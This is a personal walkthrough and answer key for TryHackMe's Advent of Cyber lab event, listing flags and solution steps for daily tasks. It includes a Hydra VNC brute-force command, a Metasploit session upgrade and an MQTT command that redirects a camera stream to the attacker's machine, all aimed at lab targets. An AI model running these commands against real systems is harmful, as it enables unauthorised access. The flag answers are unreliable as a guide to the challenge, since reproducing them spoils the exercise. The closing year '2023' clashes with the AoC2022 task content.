Introduction

The purpose of this article is to document my journey through the TryHackMe platform. This article will contain answers to the questions provided along with the thought process as to how I obtained them. I will also include any additional notes along the way.

This room is TryHackMe’s annual Christmas holiday event where they release a new room with activities everyday until the end of December.

Task 1: Introduction

Task 1.1 – Read through this section.

Question 1.1 – Read the above and check out the prizes! 

Answer 1.1 – Click the Submit button to progress to the next task.

Task 2:  Short Tutorial & Rules

Task 2.1 – Read through this section.

Question 2.1 – Practice connecting to our network!

Answer 2.1 – Click the Submit button to progress to the next task.

Task 3:  Our Socials

Task 3.1 – Read through this section.

Question 3.x – Follow us on XXX

Answer 3.x – Click the Submit button on each question to progress to the next task.

Task 4: Subscribing, TryHackMe for Business & Christmas Swag!

Task 4.1 – Read through this section.

Question 4.1 – Read the above.

Answer 4.1 – Click the Submit button to progress to the next task.

Task 5: Nightmare Before Elfmas – The Story

Task 5.1 – Read through this section.

Question 5.1 – The Christmas story is used within some of the tasks, so make sure you read the above.

Answer 5.1 – Click the Submit button to progress to the next task.

Task 6: [Day 1] Frameworks Someone’s coming to town!

Task 6.1 – Read through this section.

Task 6.2 – Click View Site to visit the task’s site.

Question 6.1 – Who is the adversary that attacked Santa’s network this year?

Answer 6.1 – The Bandit Yeti!

Question 6.2 – What’s the flag that they left behind?

Answer 6.2 – THM{IT’S A Y3T1 CHR1$TMA$}

Question 6.3 – Looking to learn more? Check out the rooms on Unified Kill Chain, Cyber Kill Chain, MITRE, or the whole Cyber Defence Frameworks module!

Answer 6.3 – Click the **Submit** button to progress to the next task.

Task 7: [Day 2] Log Analysis Santa’s Naughty & Nice Log

Task 7.1 – Read through this section.

Task 7.2 – Click Start Machine to start the machine.

Task 7.3 – SSH into the machine via it’s IP address and login using the credentials elfmcblue:tryhackme!. Alternatively, you can use the build-in AttackBox.

Question 7.1 – Ensure you are connected to the deploy-able machine in this task.

Answer 7.1 – Click the Submit button to progress to the next task.

Question 7.2 –  Use the `ls` command to list the files present in the current directory. How many log files are present?

Answer 7.2 – 2

Question 7.3 – Elf McSkidy managed to capture the logs generated by the web server. What is the name of this log file?

Answer 7.3 – webserver.log

Question 7.4 – Begin investigating the log file from question #3 to answer the following questions.

Answer 7.4 – Click the Submit button to progress to the next task.

Question 7.5 – On what day was Santa’s naughty and nice list stolen?

Answer 7.5 – Friday

Question 7.6 – What is the IP address of the attacker?

Answer 7.6 – 10.10.249.191

Question 7.7 – What is the name of the important list that the attacker stole from Santa?

Answer 7.7 – santaslist.txt

Question 7.8 – Look through the log files for the flag. The format of the flag is: THM{}

Answer 7.8 – THM{STOLENSANTASLIST}

Question 7.9 – Interested in log analysis? We recommend the Windows Event Logs room or the Endpoint Security Monitoring Module.

Answer 7.9 – Click the Submit button to progress to the next task.

Task 8: [Day 3] OSINT Nothing escapes detective McRed

Task 8.1 – Read through this section.

Question 8.1 – What is the name of the Registrar for the domain santagift.shop?

Answer 8.1 – Namecheap, Inc

Question 8.2 – Find the website’s source code (repository) on github.com and open the file containing sensitive credentials. Can you find the flag?

Answer 8.2 – {THM_OSINT_WORKS}

Question 8.3 – What is the name of the file containing passwords?

Answer 8.3 – config.php

Question 8.4 – What is the name of the QA server associated with the website?

Answer 8.4 – qa.santagift.shop

Question 8.5 – What is the DB_PASSWORD that is being reused between the QA and PROD environments?

Answer 8.5 – [email protected]

Question 8.6 – Check out this room if you’d like to learn more about Google Dorking!

Answer 8.6 – Click the Submit button to progress to the next task.

Task 9: [Day 3] Scanning Scanning through the snow

Task 9.1 – Read through this section.

Task 9.2 – Click Start Machine to start the machine.

Question 9.1 – What is the name of the HTTP server running on the remote host?

Answer 9.1 – Apache

Question 9.2 – What is the name of the service running on port 22 on the QA server?

Answer 9.2 – ssh

Question 9.3 – What flag can you find after successfully accessing the Samba service?

Answer 9.3 – {THM_SANTA_SMB_SERVER}

Question 9.4 – What is the password for the username santahr?

Answer 9.4 – santa25

Question 9.5 – If you want to learn more scanning techniques, we have a module dedicated to Nmap!

Answer 9.5 – Click the Submit button to progress to the next task.

Task 10: [Day 5] Brute-Forcing*He knows when you’re awake

Task 10.1 – Read through this section.

Task 10.2 – Click Start Machine to start the machine.

Question 10.1 – Use Hydra to find the VNC password of the target with IP address xxx.xxx.xxx.xxx. What is the password?

Answer 10.1 – 1q2w3e4r

Explanation 10.1- I ran the following command to obtain the password: hydra -P /usr/share/wordlists/rockyou.txt 10.10.42.197 vnc -V:

Question 10.2 – Using a VNC client on the AttackBox, connect to the target of IP address xxx.xxx.xxx.xxx. What is the flag written on the target’s screen?

Answer 10.2 – THM{I_SEE_YOUR_SCREEN}

Question 10.3 – If you liked the topics presented in this task, check out these rooms next: Protocols and Servers 2, HydraPassword AttacksJohn the Ripper

Answer 10.3 – Click the Submit button to progress to the next task.

Task 11: [Day 6] Email Analysis It’s beginning to look a lot like phishing

Task 11.1 – Read through this section.

Task 11.2 – Click Start Machine to start the machine.

Task 11.3 – Click Show Split View at the top of the page to connect to the machine.

Question 11.1 – What is the email address of the sender?

Answer 11.1 – [email protected]

Question 11.2 – What is the return address?

Answer 11.2 – [email protected]

Question 11.3 – On whose behalf was the email sent?

Answer 11.3 – Chief Elf

Question 11.4 – What is the X-spam score?

Answer 11.4 – 3

Question 11.5 – What is hidden in the value of the Message-ID field?

Answer 11.5 – AoC2022_Email_Analysis

Explanation 11.5 – After opening the Urgent.eml file in Sublime Text, I found the `Message-ID` field and copied the Base64-encoded value into CyberChef and decoded it there.

Question 11.6 – Visit the email reputation check website provided in the task. What is the reputation result of the sender’s email address?

Answer 11.6 – Risky

Question 11.7 – Check the attachments. What is the filename of the attachment?

Answer 11.7 – Division_of_labour-Load_share_plan.doc

Question 11.8 – What is the hash value of the attachment?

Answer 11.8 – 0827bb9a2e7c0628b82256759f0f888ca1abd6a2d903acdb8e44aca6a1a03467

Explanation 11.8 – From a terminal, I ran the following command to extract the attachment from the .eml file: emlAnalyzer -i Urgent\:.eml --extract-all. Then, I ran sha256sum Division_of_labour-Load_share_plan.doc to obtain the SHA256 hash value.

Question 11.9 – Visit the Virus Total website and use the hash value to search. Navigate to the behavior section. What is the second tactic marked in the Mitre ATT&CK section?

Answer 11.9 – Defense Evasion

Question 11.10 – Visit the InQuest website and use the hash value to search. What is the subcategory of the file?

Answer 11.10 – macro_hunter

Question 11.11 – If you want to learn more about phishing and analyzing emails, check out the Phishing module! 

Answer 11.11 – Click the Submit button to progress to the next task.

Task 12: [Day 7] CyberChef Maldocs roasting on an open fire

Task 12.1 – Read through this section.

Task 12.2 – Click Start Machine to start the machine.

Task 12.3 – Click Show Split View at the top of the page to connect to the machine.

Question 12.1 – What is the version of CyberChef found in the attached VM?

Answer 12.1 – 9.49.0

Question 12.2 – How many recipes were used to extract URLs from the malicious doc?

Answer 12.2 – 10

Question 12.3 – We found a URL that was downloading a suspicious file; what is the name of that malware?

Answer 12.3 – mysterygift.exe

Question 12.4 – What is the last de-fanged URL of the bandityeti domain found in the last step?

Answer 12.4 – hxxps[://]cdn[.]bandityeti[.]THM/files/index/

Question 12.5 – What is the ticket found in one of the domains? (Format: Domain/<GOLDEN_FLAG>)

Answer 12.5 – THM_MYSTERY_FLAG

Question 12.6 – If you liked the investigation today, you might also enjoy the [Security Information and Event Management](Security Information Event Management) module! 

Answer 12.6 – Click the Submit button to progress to the next task.

Task 13: [Day 8] Smart Contracts Last Christmas I gave you my ETH

Task 13.1 – Read through this section and follow the instructions provided.

Task 13.2 – Click Download Task Files to download the files needed to complete this task.

Question 13.1 – If not already completed, download the zip folder attached to this task, and open Remix in your preferred browser.

Answer 13.1 – Click the Submit button to progress to the next task.

Question 13.2 – What flag is found after attacking the provided EtherStore Contract?

Answer 13.2 – flag{411_ur_37h_15_m1n3}

Question 13.3 – Are you up for a little challenge to celebrate Day 8? Try your hand at these easy challenge rooms: Quotient and Agent T!

Answer 13.3 – Click the Submit button to progress to the next task.

Task 14: [Day 9] Pivoting Dock the halls

Task 14.1 – Read through this section and follow the instructions provided.

Task 14.2 – Click Start Machine to start the machine.

Question 14.1 – Deploy the attached VM, and wait a few minutes. What ports are open?

Answer 14.1 – 80

Question 14.2 – What framework is the web application developed with?

Answer 14.2 – Laravel

Question 14.3 – What CVE is the application vulnerable to?

Answer 14.3 – CVE-2021-3129

Question 14.4 – What command can be used to upgrade the last opened session to a Meterpreter session?

Answer 14.4 – sessions -u 1

Question 14.5 – What file indicates a session has been opened within a Docker container?

Answer 14.5 – /.dockerenv

Question 14.6 – What file often contains useful credentials for web applications?

Answer 14.6 – .env

Question 14.7 – What database table contains useful credentials?

Answer 14.7 – users

Question 14.8 – What is Santa’s password?

Answer 14.8 – p4$$w0rd

Question 14.9 – What ports are open on the host machine?

Answer 14.9 – 22,80

Question 14.10 – What is the root flag?

Answer 14.10 – THM{47C61A0FA8738BA77308A8A600F88E4B}

Question 14.11 – Day 9 is done! You might want to take a well-deserved rest now. If this challenge was right up your alley, though, we think you might enjoy the Compromising Active Directory module! 

Answer 14.11 – Click the Submit button to progress to the next task.

Task 15: [Day 10] Hack a game You’re a mean one, Mr. Yeti

Task 15.1 – Read through this section and follow the instructions provided.

Task 15.2 – Click Start Machine to start the machine.

Task 15.3 – Click Show Split View at the top of the page to connect to the machine.

Question 15.1 – What is the Guard’s flag?

Answer 15.1 – THM{5_star_Fl4gzzz}

Question 15.2 – What is the Yeti’s flag?

Answer 15.2 – THM{yetiyetiyetiflagflagflag}

Question 15.3 – If you liked today’s challenge, the Walking an Application room is an excellent follow-up!

Answer 15.3 – Click the Submit button to progress to the next task.

Task 16: [Day 11] Memory Forensics Not all gifts are nice

Task 16.1 – Read through this section and follow the instructions provided.

Task 16.2 – Click Start Machine to start the machine.

Task 16.3 – Click Show Split View at the top of the page to connect to the machine.

Question 16.1 – What is the Windows version number that the memory image captured?

Answer 16.1 – 10

Question 16.2 – What is the name of the binary/gift that secret Santa left?

Answer 16.2 – mysterygift.exe

Question 16.3 – What is the Process ID (PID) of this binary?

Answer 16.3 – 2040

Question 16.4 – Dump the contents of this binary. How many files are dumped?

Answer 16.4 – 16

Question 16.5 – If you want to learn more about Volatility, please check out a dedicated room here. For more content on forensics, we have a full Digital Forensics and Incident Response module for you!

Task 17: [Day 12] Malware Analysis Forensic McBlue to the REVscue!

Task 17.1 – Read through this section and follow the instructions provided.

Task 17.2 – Click Start Machine to start the machine.

Task 17.3 – Click Show Split View at the top of the page to connect to the machine.

Question 17.1 – What is the architecture of the malware sample? (32-bit/64-bit)

Answer 17.1 – 64-bit

Question 17.2 – What is the packer used in the malware sample? (format: lowercase)

Answer 17.2 – upx

Question 17.3 – What is the compiler used to build the malware sample? (format: lowercase)

Answer 17.3 – nim

Question 17.4 – How many MITRE ATT&CK techniques have been discovered attributed to the DISCOVERY tactic?

Answer 17.4 – 2

Question 17.5 – What is the registry key abused by the malware?

Answer 17.5 – HKCU\Software\Microsoft\Windows\CurrentVersion\Run\

Question 17.6 – What is the value written on the registry key based on the previous question?

Answer 17.6 – C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wishes.bat

Question 17.7 – What are the names of two files created by the malware under the C:\Users\Administrator\ directory? (format: file1,file2 in alphabetical order)

Answer 17.7 – test.jpg,wishes.bat

Question 17.8 – What are the two domains wherein malware has initiated a network connection? (format: domain1,domain2 in alphabetical order)

Answer 17.8 – bestfestivalcompany.thm,virustotal.com

Question 17.9 – Going back to strings inside the malware sample, what is the complete URL used to download the file hosted in the first domain accessed by the malware?

Answer 17.9 – @http://bestfestivalcompany.thm/favicon.ico

Question 17.10 – If you enjoyed malware analysis, try the Intro Malware Analysis or Dissecting PE Headers rooms next!

Answer 17.10 – Click the Submit button to progress to the next task.

Task 18: [Day 13] Packet Analysis Simply having a wonderful pcap time  

Task 18.1 – Read through this section and follow the instructions provided.

Task 18.2 – Click Start Machine to start the machine.

Task 18.3 – Click Show Split View at the top of the page to connect to the machine.

Question 18.1 – What is the “Percent Packets” value of the “Hypertext Transfer Protocol”?

Answer 18.1 – 0.3

Question 18.2 – Which port number has received more than 1000 packets?

Answer 18.2 – 3389

Question 18.3 – What is the service name of the used protocol that received more than 1000 packets?

Answer 18.3 – RDP

Question 18.4 – What are the domain names? Enter the domains in alphabetical order and de-fanged format. (format: domain[.]zzz,domain[.]zzz)

Answer 18.4 – bestfestivalcompany[.]thm,cdn[.]bandityeti[.]thm

Question 18.5 – What are the names of the requested files? Enter the names in alphabetical order and de-fanged format. (format: domain[.]zzz,domain[.]zzz)

Answer 18.5 – favicon[.]ico,mysterygift[.]exe

Question 18.6 – Which IP address downloaded the executable file?

Answer 18.6 – 10[.]10[.]29[.]186

Question 18.7 – Which domain address hosts the malicious file?

Answer 18.7 – cdn[.]bandityeti[.]thm

Question 18.8 – What is the “user-agent” value used to download the non-executable file?

Answer 18.8 – Nim httpclient/1.6.8

Question 18.9 – Export objects from the PCAP file. Calculate the file hashes. What is the sha256 hash value of the executable file?

Answer 18.9 – 0ce160a54d10f8e81448d0360af5c2948ff6a4dbb493fe4be756fc3e2c3f900f

Question 18.10 – Search the hash value of the executable file on VirusTotal. Navigate to the “Behavior” section. There are multiple IP addresses associated with this file. What are the connected IP addresses? Enter the IP addressed de fanged and in numerical order. (format: IPADDR,IPADDR) Please note that the VT entry changed since the official walk through video was recorded – check the VT website to get all the IP addresses you need!

Answer 18.10 – 20[.]99[.]133[.]109,20[.]99[.]184[.]37,23[.]216[.]147[.]64,23[.]216[.]147[.]76

Question 18.11 – If you liked working with Wireshark, we have a comprehensive module on this helpful tool here. If you want to dive deeper, the Network Security and Traffic Analysis module is waiting for you!

Answer 18.11 – Click the Submit button to progress to the next task.

Task 19: [Day 14] Web Applications I’m dreaming of secure web apps  

Task 19.1 – Read through this section and follow the instructions provided.

Task 19.2 – Click Start Machine to start the machine.

Task 19.3 – Access the the machine via it’s IP address via VPN. Alternatively, you can use the build-in AttackBox.

Question 19.1 – What is the office number of Elf Pivot McRed?

Answer 19.1 – 134

Question 19.1 – Not only profile pages but also stored images are vulnerable. Start with a URL of a valid profile image; what is the hidden flag?

Answer 19.1 – THM{CLOSE_THE_DOOR}

Question 19.1 – Do you like IDOR? It’s an Advent of Cyber classic! If you want more, check out the dedicated [room](Click the Submit button to progress to the next task.) or the Corridor challenge.

Answer 19.1 – Click the Submit button to progress to the next task.

Task 20: [Day 15] Secure Coding Santa is looking for a Sidekick  

Task 20.1 – Read through this section and follow the instructions provided.

Task 20.2 – Click Start Machine to start the machine.

Task 20.3 – Access the the machine via it’s IP address via VPN. Alternatively, you can use the build-in AttackBox.

Question 20.1 – What is the name given to file uploads that allow threat actors to upload any files that they want?

Answer 20.1 – unrestricted

Question 20.2 – What is the title of the web application developed by Santa’s freelancer?

Answer 20.2 – SantaSidekick2

Question 20.3 – What is the value of the flag stored in the HR Elf’s Documents directory?

Answer 20.3 – THM{Naughty.File.Uploads.Can.Get.You.RCE}

Question 20.4 – What defense technique can be implemented to ensure that specific file types can be uploaded?

Answer 20.4 – file extension validation

Question 20.5 – What defense technique can be used to make sure the threat actor cannot recover their file again by simply using the file name?

Answer 20.5 – file renaming

Question 20.6 – What defense technique can be used to make sure malicious files that can hurt elves are not uploaded?

Answer 20.6 – malware scanning

Question 20.7 – If you want to learn more about vulnerabilities like this one, check out our Intro to Web Hacking module!

Answer 20.7 – Click the Submit button to progress to the next task.

Task 21: [Day 16] *Secure Coding SQLi’s the king, the carolers sing

Task 21.1 – Read through this section and follow the instructions provided.

Task 21.2 – Click Start Machine to start the machine.

Task 21.3 – Access the the machine via it’s IP address via VPN. Alternatively, you can use the build-in AttackBox.

Question 21.1 – What is the value of Flag1?

Answer 21.1 – THM{McCode, Elf McCode}

Question 22.1 – What is the value of Flag2?

Answer 22.1 – THM{KodeNRoll}

Question 23.1 – What is the value of Flag3?

Answer 23.1 – THM{Are we secure yet?}

Question 24.1 – What is the value of Flag4?

Answer 24.1 – THM{SQLi_who???}

Question 25.1 – If you’d like more SQLi in your life, check out this room!

Answer 25.1 – Click the Submit button to progress to the next task.

Task 22: [Day 17] Secure Coding Filtering for Order Amidst Chaos

Task 22.1 – Read through this section and follow the instructions provided.

Task 22.2 – Click Start Machine to start the machine.

Task 22.3 – Click Show Split View at the top of the page to connect to the machine.

Question 22.1 – Filtering for Usernames: How many usernames fit the syntax above?

Answer 22.1 – 8

Explanation 22.1 – egrep '^[a-zA-Z0-9]{6,12}$' strings was run to obtain the answer above

Question 22.2 – Filtering for Usernames: One username consists of a readable word concatenated with a number. What is it?

Answer 22.2 – User35

Question 22.3 – Filtering for Emails: How many emails fit the syntax above?

Answer 22.3 – 11

Explanation 22.3 – egrep '.+[@].+\.[com]{3,3}$' strings was run to obtain the answer above

Question 22.4 – Filtering for Emails: How many unique domains are there?

Answer 22.4 – 8

Question 22.5 – Filtering for Emails: What is the domain of the email with the local-part “lewisham44”?

Answer 22.5 – amg.com

Question 22.6 – Filtering for Emails: What is the domain of the email with the local-part “maxximax”?

Answer 22.6 – fedfull.com

Question 22.7 – Filtering for Emails: What is the local-part of the email with the domain name “hotmail.com”?

Answer 22.7 – hussain.volt

Question 22.8 – Filtering for URLs: How many URLs fit the syntax provided?

Answer 22.8 – 16

Explanation 22.8 – egrep '^http(s)?.{3}(www)?.+\..+$' strings was run to obtain the answer above

Question 22.9 – Filtering for URLs: How many of these URLs start with “https”?

Answer 22.9 – 7

Question 22.10 – If you feel like you could use more fundamental skills in your life, try the Linux Fundamentals module. All rooms are free in that one!

Answer 22.10 – Click the Submit button to progress to the next task.

Task 23: [Day 18] Sigma Lumberjack Lenny Learns New Rules

Task 23.1 – Read through this section and follow the instructions provided.

Task 23.2 – Click *tart Machine to start the machine.

Task 23.3 – Access the the machine via it’s IP address via VPN. Alternatively, you can use the build-in AttackBox.

Question 23.1 – What is the Challenge #1 flag?

Answer 23.1 – THM{n0t_just_your_u$ser}

Explanation 23.1 – The following is the YAML file I used to obtain the flag:

title: Suspicious Local Account Creation
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4720
  condition: selection

Question 23.2 – From the Challenge 1 log, what user account was created?

Answer 23.2 – BanditYetiMini

Question 23.3 – What is the Challenge #2 flag?

Answer 23.3 – THM{[email protected]_1s_Runn1ng_H3r3}

Explanation 23.3 – The following is the YAML file I used to obtain the flag:

title: susp_software_discovery
logsource:
  product: windows
  service: sysmon
  category: process_creation
detection:
  selection:
    EventID: 1
    Image|endswith: '\reg.exe'
    CommandLine|contains|all:
      - 'Internet Explorer'
      - '/v svcVersion'
  condition: selection

Question 23.4 – What was the User’s path in the Challenge #2 log file?

Answer 23.4 – SIGMA_AOC2022\Bandit Yeti

Question 23.5 – What is the Challenge #3 flag?

Answer 23.5 – THM{sch3dule_0npo1nt_101}

Explanation 23.5 – The following is the YAML file I used to obtain the flag:

title: schtasks_creation
logsource:
  product: windows
  service: sysmon
  category: process_creation
detection:
  selection:
    EventID: 1
    Image|endswith: 'schtasks.exe'
    CommandLine|contains|all:
      - '/create'
  condition: selection

Question 23.6 – What was the MD5 hash associated with Challenge #3 logs?

Answer 23.6 – 2F6CE97FAF2D5EEA919E4393BDD416A7

Question 23.7 – Did you like learning about detection? Check out the Yara room to learn more!

Answer 23.7 – Click the Submit button to progress to the next task.

Task 24: [Day 19] Hardware Hacking Wiggles go brrr

Task 24.1 – Read through this section and follow the instructions provided.

Task 24.2 – Click Start Machine to start the machine.

Task 24.3 – Click Show Split View at the top of the page to connect to the machine.

Question 24.1 – What device can be used to probe the signals being sent on electrical wires between two devices?

Answer 24.1 – logic analyser

Question 24.2 – USART is faster than SPI for communication? (Yea,Nay)

Answer 24.2 –  Nay

Question 24.3 – USART communication uses fewer wires than SPI? (Yea,Nay)

Answer 24.3 – Yea

Question 24.4 – USART is faster than I2C for communication? (Yea,Nay)

Answer 24.4 – Nay

Question 24.5 – I2C uses more wires than SPI for communication? (Yea,Nay)

Answer 24.5 – Nay

Question 24.6 – SPI is faster than I2C for communication? (Yea,Nay)

Answer 24.6 – Yea

Question 24.7 – What is the maximum number of devices that can be connected on a single pair of I2C lines?

Answer 24.7 – 1008

Question 24.8 – What is the new baud rate that is negotiated between the microprocessor and ESP32 chip?

Answer 24.8 – 9600

Question 24.9 – What is the flag that is transmitted once the new baud rate was accepted?

Answer 24.9 – THM{Hacking.Hardware.Is.Fun}

Question 24.10 – Looking for a challenge? Try our Recent Threats module!

Answer 24.10 – Click the Submit button to progress to the next task.

Task 25: [Day 20] Firmware Binwalkin’ around the Christmas tree

Task 25.1 – Read through this section and follow the instructions provided.

Task 25.2 – Click Start Machine to start the machine.

Task 25.3 – Click Show Split View at the top of the page to connect to the machine.

Question 25.1 – What is the flag value after reversing the file firmwarev2.2-encrypted.gpg? Note: The flag contains underscores – if you’re seeing spaces, the underscores might not be rendering.

Answer 25.1 – THM{WE_GOT_THE_FIRMWARE_CODE}

Explanation 25.1 – I ran the following command to obtain this answer: grep -ir thm

Question 25.2 – What is the Paraphrase value for the binary firmwarev1.0_unsigned?

Answer 25.2 – [email protected]

Explanation 25.2 – I ran the following command to obtain this answer: grep -ir paraphrase

Question 25.3 – After reversing the encrypted firmware, can you find the build number for rootfs?

Answer 25.3 – 2.6.31

Explanation 25.3 – I ran the following command to obtain this answer: grep -ir build

Question 25.4 – Did you know we have a wonderful community on Discord? If you join us there, you can count on nice conversation, cyber security tips & tricks, and room help from our mods and mentors. Our Discord admin has some rooms out, too – you can try an easy one or a hard one!

Answer 25.4 – Click the Submit button to progress to the next task.

Task 26: [Day 21] MQTT Have yourself a merry little webcam

Task 26.1 – Read through this section and follow the instructions provided.

Task 26.2 – Click Start Machine to start the machine.

Task 26.3 – Access the the machine via it’s IP address via VPN. Alternatively, you can use the build-in AttackBox.

Question 26.1 – What port is Mosquitto running on?

Answer 26.1 – 1883

Explanation 26.1 – I ran the following command to obtain the answer above: nmap -p- <Target IP> -vv --min-rate 1500

Question 26.2 – Is the device/init topic enumerated by Nmap during a script scan of all ports? (y/n)

Answer 26.2 – y

Explanation 26.2 – I ran the following command to obtain the answer above: nmap -sC -sV -p- <Target IP> -vv --min-rate 1500

Question 26.3 – What Mosquitto version is the device using?

Answer 26.3 – 1.6.9

Explanation 26.3 – I ran the following command to obtain the answer above: nmap -sC -sV -p- <Target IP> -vv --min-rate 1500

Question 26.4 – What flag is obtained from viewing the RTSP stream?

Answer 26.4 – THM{UR_CAMERA_IS_MINE}

Explanation 26.4 – I ran the following command to start the RTSP server on my attackbox: docker run --rm -it --network=host aler9/rtsp-simple-server. Next, I sent the command to the remote device to redirect the RTSP stream to my attackbox: mosquitto_pub -h 10.10.148.98 -t /device/PW5UAMREVWA7VXJ4EYBY/cmd -m """{"cmd":"10","url":"rtsp://10.10.71.97:8554/thm"}""". However, after trying this multiple times, it did not work. Ultimately, I had to refer to the walk-through video to get the answer for the above question.

Question 26.5 – If you want to learn more check out the Command Injection room or the Vulnerability Research module!

Answer 26.5 – Click the Submit button to progress to the next task.

Task 27: [Day 22] Attack Surface Reduction Threats are failing all around me

Task 27.1 – Read through this section and follow the instructions provided.

Task 27.2 – Click Start Machine to start the machine.

Task 27.3 – Click View Site to visit the task’s site.

Question 27.1 – Follow the instructions in the attached static site to help McSkidy reduce her attack surface against attacks from the Yeti. Use the flag as an answer to complete the task.

Answer 27.1 – THM{4TT4CK SURF4C3 R3DUC3D}

Question 27.2 – If you’d like to study cyber defense more, why not start with the Threat and Vulnerability Management module?

Answer 27.2 – Click the Submit button to progress to the next task.

Task 28: [Day 23] Defense in Depth Mission ELFPossible: Abominable for a Day

Task 28.1 – Read through this section and follow the instructions provided.

Task 28.2 – Click **Start Machine** to start the machine.

Task 28.3 – Click **View Site** to visit the task’s site.

Question 28.1 – Case 1: What is the password for Santa’s Vault?

Answer 28.1 – [email protected]

Question 28.2 – Case 1: What is the Flag?

Answer 28.2 – THM{[email protected]!}

Question 28.3 – Case 2: What is Santa’s favorite thing?

Answer 28.3 – MilkAndCookies

Question 28.4 – Case 2: What is the password for Santa’s Vault?

Answer 28.4 – 3XtrR@[email protected]

Question 28.5 – Case 2: What is the Flag?

Answer 28.5 – THM{[email protected]_5t3pS_n0w!}

Question 28.6 – Case 3: What is the Executive Assistant’s favorite thing?

Answer 28.6 – BanoffeePie

Question 28.7 – Case 3: What is Santa’s previous password?

Answer 28.7 – [email protected]_01

Question 28.8 – Case 3: What is Santa’s current password?

Answer 28.8 – [email protected]_02

Question 28.9 – Case 3: What is the 1st part of the vault’s password?

Answer 28.9 – N3w4nd1m

Question 28.10 – Case 3: What is the 2nd part of the vault’s password?

Answer 28.10 – [email protected]

Question 28.11 – Case 3: What is the password for Santa’s Vault?

Answer 28.11 – [email protected]@ultPW

Question 28.12 – Case 3: What is the Flag?

Answer 28.12 – THM{[email protected][email protected]}

Question 28.13 – What is Santa’s Code?

Answer 28.13 – 2845

Question 28.14 – Mission ELFPossible: What is the Abominable for a Day Flag?

Answer 28.14 – THM{D3f3n5e_1n_D3pth_1s_k00L!!}

Question 28.15 – If you’d like to learn more about mitigating and managing potential adversary actions, check out the Cyber Threat Intelligence module! 

Answer 28.15 – Click the Submit button to progress to the next task.

Task 29: [Day 24] Feedback Ho, ho, ho, the survey’s short

Task 29.1 – Read through this section and follow the instructions provided.

Question 29.1 –  Please help us improve by answering this 5-minute survey. Make sure to grab the flag before you click “Submit”!

Answer 29.1 – THM{AoC2022!thank_you!}

Question 29.1 –  Continue learning with the Pre SecurityJr Penetration Tester, or SOC Level1 pathway!

Answer 29.1 – Click the Submit button to progress to the next task.

Question 29.1 – The prize winners will be announced on the 28th of December – you have until then to complete the tasks. Remember, the more questions you answer, the higher your chance of winning! The daily prize winners for the last week of the event will be announced on Twitter on Wednesday, December 28th.

Answer 29.1 – Click the Submit button to progress to the next task.

Task 23: [Day 24] The End The Year of the Bandit Yeti

Task 23.1 – Read through this section and follow the instructions provided.

Question 23.1 – Are you ready to continue your learning journey on TryHackMe? (Yea,Yea)

Answer 23.1 – Yea

My Conclusion

The Advent of Cyber 2023 event was a very fun and educational experience for me. It covered a range of topics, including Red Teaming, Secure Coding, Web Vulnerabilities, Blue Teaming, and IoT Hacking, which helped me gain a better understanding of how to identify, prevent, and respond to cyber threats. I also learned about the importance of Red Teaming and how to write secure code, as well as how to protect against security incidents and threats through the information on Blue Teaming and IoT hacking. This event was a valuable learning opportunity that has equipped me with the necessary knowledge and skills to improve my cybersecurity awareness. I highly recommend this event, as well as other similar ones on the TryHackMe platform, to anyone interested in learning more about cybersecurity.